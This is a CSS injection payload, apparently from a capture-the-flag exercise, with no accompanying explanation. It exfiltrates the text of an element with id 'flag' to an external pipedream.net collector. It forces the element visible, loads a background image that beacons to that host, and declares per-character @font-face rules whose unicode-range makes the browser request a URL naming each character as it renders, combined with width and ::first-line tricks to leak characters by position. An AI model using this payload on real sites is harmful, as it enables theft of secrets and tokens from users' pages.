body{background-image:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=W19')}
#page{content-visibility:hidden;animation:unveil 0.001s 0.3s forwards}
@keyframes unveil{to{content-visibility:visible}}
#flag{display:block!important}
#flag{font-family:p97w19,p98w19,p106w19,p112w19,p115w19,p121w19,p122w19,p48w19,p49w19,p52w19,p53w19,p55w19,p125w19,monospace;width:19ch;white-space:pre-wrap;word-break:break-all;overflow:visible}
#flag::first-line{font-family:monospace!important}
@font-face{font-family:p97w19;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=a_W19');unicode-range:U+0061}
@font-face{font-family:p98w19;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=b_W19');unicode-range:U+0062}
@font-face{font-family:p106w19;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=j_W19');unicode-range:U+006A}
@font-face{font-family:p112w19;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=p_W19');unicode-range:U+0070}
@font-face{font-family:p115w19;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=s_W19');unicode-range:U+0073}
@font-face{font-family:p121w19;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=y_W19');unicode-range:U+0079}
@font-face{font-family:p122w19;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=z_W19');unicode-range:U+007A}
@font-face{font-family:p48w19;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=0_W19');unicode-range:U+0030}
@font-face{font-family:p49w19;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=1_W19');unicode-range:U+0031}
@font-face{font-family:p52w19;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=4_W19');unicode-range:U+0034}
@font-face{font-family:p53w19;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=5_W19');unicode-range:U+0035}
@font-face{font-family:p55w19;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=7_W19');unicode-range:U+0037}
@font-face{font-family:p125w19;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=%7D_W19');unicode-range:U+007D}